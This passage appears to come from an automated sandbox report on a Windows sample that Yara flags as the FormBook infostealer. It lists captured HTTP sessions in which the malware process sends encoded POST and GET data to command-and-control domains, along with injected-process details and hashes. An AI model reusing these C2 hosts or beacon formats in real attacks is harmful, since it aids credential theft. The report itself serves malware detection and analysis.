2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> <
Jan 11, 2025 02:47:13.188985109 CET	224	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 75 7a 73 68 6f 75 2e 77 6f 72 6c 64 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c 65 3e Data Ascii: !--<![endif]--><head><title>www.uzshou.world \| 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE
Jan 11, 2025 02:47:13.188996077 CET	1236	IN	Data Raw: 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 Data Ascii: =Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /></head><body><div id="cf-wrappe
Jan 11, 2025 02:47:13.189063072 CET	1236	IN	Data Raw: 3a 62 6f 72 64 65 72 2d 30 20 6d 64 3a 62 6f 72 64 65 72 2d 62 20 6d 64 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 34 30 30 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 66 6c 6f 61 74 2d 6c 65 66 74 20 6d 64 3a 66 6c 6f 61 74 2d 6e 6f 6e 65 20 Data Ascii: :border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md:m-0"> <span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="c
Jan 11, 2025 02:47:13.189073086 CET	1236	IN	Data Raw: 6c 61 73 73 3d 22 6d 64 3a 62 6c 6f 63 6b 20 77 2d 66 75 6c 6c 20 74 72 75 6e 63 61 74 65 22 3e 4e 65 77 61 72 6b 3c 2f 73 70 61 6e 3e 0a 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 6d 64 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 74 2d 33 20 6d 64 Data Ascii: lass="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.uzshou.
Jan 11, 2025 02:47:13.189084053 CET	1236	IN	Data Raw: 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
Jan 11, 2025 02:47:13.189147949 CET	1236	IN	Data Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">90013cce8ec8de9a</strong></span> <span class="cf-footer-separator sm:
Jan 11, 2025 02:47:13.189157963 CET	132	IN	Data Raw: 74 4c 69 73 74 65 6e 65 72 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 64 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 65 72 72 Data Ascii: tListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	50013	104.21.96.1	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:15.356676102 CET	438	OUT	GET /kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.uzshou.world Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:47:15.909913063 CET	956	IN	HTTP/1.1 521 Date: Sat, 11 Jan 2025 01:47:15 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VulfDB0fZRr32jBCIUCS88TJ%2BuFn%2F16zA79Iy1hG1U8T0EJ087YPHc9m%2B5qnxBlcYu%2BbCf%2BjojgS35GgTJgiucnJPwq9yH7iF6lXIjNjdcn8X2P5SzyvW0PSzRBq0rdsf97"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 90013cdf8cf072a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=438&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	50014	75.2.103.23	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:21.321692944 CET	706	OUT	POST /uj4z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.orthomumbai.online Origin: http://www.orthomumbai.online Referer: http://www.orthomumbai.online/uj4z/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 63 74 57 39 2f 69 5a 79 65 45 6c 45 5a 6d 72 68 6a 4b 45 44 62 65 6d 4d 51 64 53 65 65 77 62 68 65 68 38 31 69 43 30 6d 66 49 56 4c 48 73 71 4a 79 36 79 51 52 33 79 51 49 32 39 66 73 38 44 79 38 4f 2b 7a 45 67 74 4c 7a 65 66 62 64 4d 45 50 67 2f 39 75 42 4d 6f 69 63 31 72 41 75 48 59 6b 48 74 67 38 37 74 78 2b 72 63 34 54 39 63 50 62 77 59 7a 6d 49 63 4c 64 61 74 4b 70 54 74 71 53 51 2b 31 7a 53 72 49 67 35 76 41 67 64 59 73 58 59 6e 74 58 70 43 77 66 6e 69 49 69 67 46 67 4f 37 57 59 2f 79 46 6e 38 36 4e 71 32 2f 42 2b 38 6b 79 66 68 58 32 65 56 48 59 68 7a 66 6a 53 4b 6b 31 48 54 31 4e 79 70 67 67 4f 62 33 48 70 35 44 77 3d 3d Data Ascii: cNPH=ctW9/iZyeElEZmrhjKEDbemMQdSeewbheh81iC0mfIVLHsqJy6yQR3yQI29fs8Dy8O+zEgtLzefbdMEPg/9uBMoic1rAuHYkHtg87tx+rc4T9cPbwYzmIcLdatKpTtqSQ+1zSrIg5vAgdYsXYntXpCwfniIigFgO7WY/yFn86Nq2/B+8kyfhX2eVHYhzfjSKk1HT1NypggOb3Hp5Dw==
Jan 11, 2025 02:47:21.774604082 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	50015	75.2.103.23	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:23.873683929 CET	726	OUT	POST /uj4z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.orthomumbai.online Origin: http://www.orthomumbai.online Referer: http://www.orthomumbai.online/uj4z/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 63 74 57 39 2f 69 5a 79 65 45 6c 45 4c 32 62 68 76 4a 63 44 54 65 6d 4e 4a 39 53 65 4d 77 62 6c 65 68 34 31 69 44 67 49 66 37 68 4c 48 4f 79 4a 7a 37 79 51 53 33 79 51 48 57 39 67 78 73 43 2b 38 4f 69 37 45 6c 56 4c 7a 65 62 62 64 4e 55 50 67 4d 56 78 51 4d 6f 67 4a 6c 71 6d 78 33 59 6b 48 74 67 38 37 73 52 45 72 59 55 54 39 6f 4c 62 78 38 6e 70 4c 63 4c 63 54 4e 4b 70 58 74 71 65 51 2b 31 52 53 71 55 61 35 71 45 67 64 5a 63 58 59 31 56 55 77 79 77 64 36 79 49 33 75 55 41 4b 37 47 6c 47 39 45 79 6b 33 4e 36 67 36 33 2f 65 2b 51 54 4e 4a 6e 6d 75 44 61 46 46 49 46 50 2f 6d 30 44 4c 34 76 47 49 2f 58 72 78 36 56 49 39 56 4e 31 6e 36 75 6b 2b 4c 78 76 5a 48 74 34 73 6c 61 75 2b 77 4d 38 3d Data Ascii: cNPH=ctW9/iZyeElEL2bhvJcDTemNJ9SeMwbleh41iDgIf7hLHOyJz7yQS3yQHW9gxsC+8Oi7ElVLzebbdNUPgMVxQMogJlqmx3YkHtg87sRErYUT9oLbx8npLcLcTNKpXtqeQ+1RSqUa5qEgdZcXY1VUwywd6yI3uUAK7GlG9Eyk3N6g63/e+QTNJnmuDaFFIFP/m0DL4vGI/Xrx6VI9VN1n6uk+LxvZHt4slau+wM8=
Jan 11, 2025 02:47:24.331353903 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	50016	75.2.103.23	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:26.425172091 CET	1739	OUT	POST /uj4z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.orthomumbai.online Origin: http://www.orthomumbai.online Referer: http://www.orthomumbai.online/uj4z/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 63 74 57 39 2f 69 5a 79 65 45 6c 45 4c 32 62 68 76 4a 63 44 54 65 6d 4e 4a 39 53 65 4d 77 62 6c 65 68 34 31 69 44 67 49 66 37 35 4c 48 39 36 4a 79 59 61 51 54 33 79 51 4f 32 39 62 78 73 43 7a 38 4f 71 2f 45 6c 49 38 7a 63 7a 62 63 76 4d 50 6d 39 56 78 4a 63 6f 67 52 56 71 79 75 48 5a 6d 48 74 77 34 37 73 68 45 72 59 55 54 39 75 6e 62 68 59 7a 70 48 38 4c 64 61 74 4b 62 54 74 72 4c 51 2b 64 37 53 70 34 77 35 2b 77 67 64 35 4d 58 66 41 42 55 76 43 77 44 37 79 4a 79 75 55 4e 55 37 46 41 35 39 46 33 4a 33 4c 4b 67 35 43 43 42 69 78 37 69 4e 6d 79 68 4c 34 41 6c 46 6c 75 4f 6d 48 44 6d 77 2f 4f 30 33 45 65 46 35 6b 34 51 41 62 64 69 34 6f 6f 6f 51 52 76 4d 44 70 4e 55 33 6f 2f 2b 72 4d 4f 68 76 43 77 37 51 34 52 41 56 58 34 53 77 43 35 32 42 68 2f 6e 34 71 43 4d 59 68 36 66 74 48 39 6f 4c 41 50 62 76 37 2b 61 34 6e 4c 30 75 66 78 42 64 46 55 57 74 69 52 34 49 4a 70 39 45 6d 65 79 48 57 71 57 6b 34 44 44 61 33 50 67 38 4d 6e 42 50 30 59 33 4d 63 53 44 43 64 50 36 68 30 57 6c 6f 33 67 54 35 [TRUNCATED] Data Ascii: cNPH=ctW9/iZyeElEL2bhvJcDTemNJ9SeMwbleh41iDgIf75LH96JyYaQT3yQO29bxsCz8Oq/ElI8zczbcvMPm9VxJcogRVqyuHZmHtw47shErYUT9unbhYzpH8LdatKbTtrLQ+d7Sp4w5+wgd5MXfABUvCwD7yJyuUNU7FA59F3J3LKg5CCBix7iNmyhL4AlFluOmHDmw/O03EeF5k4QAbdi4oooQRvMDpNU3o/+rMOhvCw7Q4RAVX4SwC52Bh/n4qCMYh6ftH9oLAPbv7+a4nL0ufxBdFUWtiR4IJp9EmeyHWqWk4DDa3Pg8MnBP0Y3McSDCdP6h0Wlo3gT5vNyUZSRlwKwhQ2XF3A4Du3t5YEHrrHBCfWkc9je6eemqQ0Q76oGUj3iVE5+1h7ocvDGPzIWYhVDutJryfRXB24x/7ThiBu8Y1DiHaJVw45LvsVJfOWEjV9LzX16YKnUIRkjsC+35RBuf4EK+Rlc0X9zd7UEq0BE8XYuFcWMgxVJCMfvgc6goYCXVGdxo6IdkkfggvKaRRn83k7nck7VG0/h+OG369pDrW7GioXTUuHa7iMmvVxeL59d88JpGTKN26I/FhKYEh/DdUefBx85hhich8Jk+dwfRPbWqxa2A16FGE/3Edw8nYlbsiut009+8l7Tx+ovjR8kUvpTc8OMsuVwPFao1AIgcp3bsKCCUREAq/XEOMkDctzdM1suq7UKehaUDmntkzJoH7s/+QRSrK6mtFwbnpUDLNzXPnFnNXGwnlGf7f04B8k4wiOKrTFvtCV0/VQ2s5/HAv917pmP7k9Tedu0r12DCqfaEa8wToezHCjarP+FHso/K2DiHWmVSwHibtjZcuvDnxCMDNG8lhACRLTzwRFh+w/ryMoqbww2fv3M8AfWLwJukmkJti1IKWN+k/OiER1DM6Pb25dp29op0CMl+1E0cnqqafTbK1L+sw90ztFAp0kWfL8XRvu+hZyuAgsbkSnX+McP5++K20OT2ZB0YY82hlQ [TRUNCATED]
Jan 11, 2025 02:47:26.907094002 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	50017	75.2.103.23	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:28.969903946 CET	444	OUT	GET /uj4z/?cNPH=Rv+d8Vs9QFh7eFGUjZF/XurtC+CuZHbGRmUS1zsDZ6F1EcO3zJOMOEGzKUBqsPG0xKvqL2cjuvX3dLI344VOQvo4ekzNmUg9f6dKwYBEi/hv3+rbh8HEetaIdO68foaZIfZ4bIgAitoH&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.orthomumbai.online Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:47:29.435446024 CET	403	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 01:47:29 GMT content-length: 282 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 63 4e 50 48 3d 52 76 2b 64 38 56 73 39 51 46 68 37 65 46 47 55 6a 5a 46 2f 58 75 72 74 43 2b 43 75 5a 48 62 47 52 6d 55 53 31 7a 73 44 5a 36 46 31 45 63 4f 33 7a 4a 4f 4d 4f 45 47 7a 4b 55 42 71 73 50 47 30 78 4b 76 71 4c 32 63 6a 75 76 58 33 64 4c 49 33 34 34 56 4f 51 76 6f 34 65 6b 7a 4e 6d 55 67 39 66 36 64 4b 77 59 42 45 69 2f 68 76 33 2b 72 62 68 38 48 45 65 74 61 49 64 4f 36 38 66 6f 61 5a 49 66 5a 34 62 49 67 41 69 74 6f 48 26 45 74 4a 54 58 3d 5f 4a 56 58 34 72 79 78 44 52 51 70 4c 4a 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?cNPH=Rv+d8Vs9QFh7eFGUjZF/XurtC+CuZHbGRmUS1zsDZ6F1EcO3zJOMOEGzKUBqsPG0xKvqL2cjuvX3dLI344VOQvo4ekzNmUg9f6dKwYBEi/hv3+rbh8HEetaIdO68foaZIfZ4bIgAitoH&EtJTX=_JVX4ryxDRQpLJF"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50018	134.122.133.80	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:34.733395100 CET	685	OUT	POST /pv93/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.44756.pizza Origin: http://www.44756.pizza Referer: http://www.44756.pizza/pv93/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 2f 4d 56 64 57 50 5a 46 30 55 45 37 41 48 34 64 72 58 72 35 71 31 65 65 32 66 73 4b 59 59 6b 2f 63 44 47 4c 31 36 6e 51 51 41 64 32 6d 7a 63 68 4a 70 78 54 4e 65 51 6f 7a 67 79 52 62 4f 7a 6d 2b 6e 4a 70 74 56 65 4e 6a 47 4b 61 6f 66 4d 33 57 2b 78 41 62 56 66 49 66 41 4e 42 74 6d 38 4f 4c 76 6e 7a 76 2b 52 6f 4a 36 6d 31 4d 2b 61 67 50 77 75 64 4a 65 68 35 51 33 7a 31 68 6c 62 79 63 6a 36 4b 53 61 4c 6a 66 47 64 4b 30 72 69 37 62 62 4c 4b 75 45 5a 7a 44 39 65 31 30 47 32 4c 4f 6b 78 56 61 54 66 32 34 2f 39 53 78 71 49 4d 7a 6c 63 67 63 54 6c 54 65 70 47 45 56 41 35 4c 41 6d 4f 77 4c 4b 65 31 33 65 5a 65 66 4c 30 41 50 77 3d 3d Data Ascii: cNPH=/MVdWPZF0UE7AH4drXr5q1ee2fsKYYk/cDGL16nQQAd2mzchJpxTNeQozgyRbOzm+nJptVeNjGKaofM3W+xAbVfIfANBtm8OLvnzv+RoJ6m1M+agPwudJeh5Q3z1hlbycj6KSaLjfGdK0ri7bbLKuEZzD9e10G2LOkxVaTf24/9SxqIMzlcgcTlTepGEVA5LAmOwLKe13eZefL0APw==
Jan 11, 2025 02:47:35.586419106 CET	312	IN	HTTP/1.1 404 Not Found Content-Length: 148 Content-Type: text/html Date: Sat, 11 Jan 2025 01:47:35 GMT Etag: "6743f11f-94" Server: nginx Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.7	50019	134.122.133.80	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:38.644761086 CET	705	OUT	POST /pv93/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.44756.pizza Origin: http://www.44756.pizza Referer: http://www.44756.pizza/pv93/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 2f 4d 56 64 57 50 5a 46 30 55 45 37 42 6e 6f 64 37 45 44 35 74 56 65 52 7a 66 73 4b 54 34 6b 37 63 44 43 4c 31 37 6a 2b 52 79 70 32 6d 53 73 68 49 6f 78 54 4f 65 51 6f 6e 51 79 59 56 75 7a 74 2b 6e 45 57 74 58 61 4e 6a 47 65 61 6f 61 6f 33 57 74 5a 44 62 46 66 4f 54 67 4e 44 69 47 38 4f 4c 76 6e 7a 76 2b 56 47 4a 36 4f 31 4d 50 71 67 50 55 36 61 58 4f 68 36 41 48 7a 31 6c 6c 62 32 63 6a 36 6f 53 62 58 5a 66 46 31 4b 30 75 65 37 61 49 54 46 6e 45 5a 31 4d 64 66 57 7a 33 72 31 43 6c 4d 6e 53 6a 4f 71 35 74 51 33 30 63 4a 75 70 48 51 4d 43 43 64 6f 61 72 69 79 43 6d 6b 2b 43 6e 4b 6f 47 6f 71 55 6f 70 38 30 53 5a 56 45 5a 47 44 75 51 6e 53 30 6d 65 4a 4b 45 37 38 66 41 4d 65 2f 62 66 34 3d Data Ascii: cNPH=/MVdWPZF0UE7Bnod7ED5tVeRzfsKT4k7cDCL17j+Ryp2mSshIoxTOeQonQyYVuzt+nEWtXaNjGeaoao3WtZDbFfOTgNDiG8OLvnzv+VGJ6O1MPqgPU6aXOh6AHz1llb2cj6oSbXZfF1K0ue7aITFnEZ1MdfWz3r1ClMnSjOq5tQ30cJupHQMCCdoariyCmk+CnKoGoqUop80SZVEZGDuQnS0meJKE78fAMe/bf4=
Jan 11, 2025 02:47:39.502336979 CET	312	IN	HTTP/1.1 404 Not Found Content-Length: 148 Content-Type: text/html Date: Sat, 11 Jan 2025 01:47:39 GMT Etag: "6743f11f-94" Server: nginx Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	20:43:28
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\k9OEsV37GE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\k9OEsV37GE.exe"
Imagebase:	0xf00000
File size:	1'293'824 bytes
MD5 hash:	6BA61148828CEAF0251C9676E9D7C5FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:43:33
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\k9OEsV37GE.exe"
Imagebase:	0xbc0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1679280371.0000000005150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1678559099.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1678063769.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:17:08
Start date:	10/01/2025
Path:	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe"
Imagebase:	0x200000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3753130642.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:17:11
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\relog.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\relog.exe"
Imagebase:	0x510000
File size:	45'568 bytes
MD5 hash:	DA20D543A130003B427AEB18AE2FE094
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3745363879.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3750754693.00000000025E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3750980212.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	22:17:24
Start date:	10/01/2025
Path:	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe
Wow64 process (32bit):	true
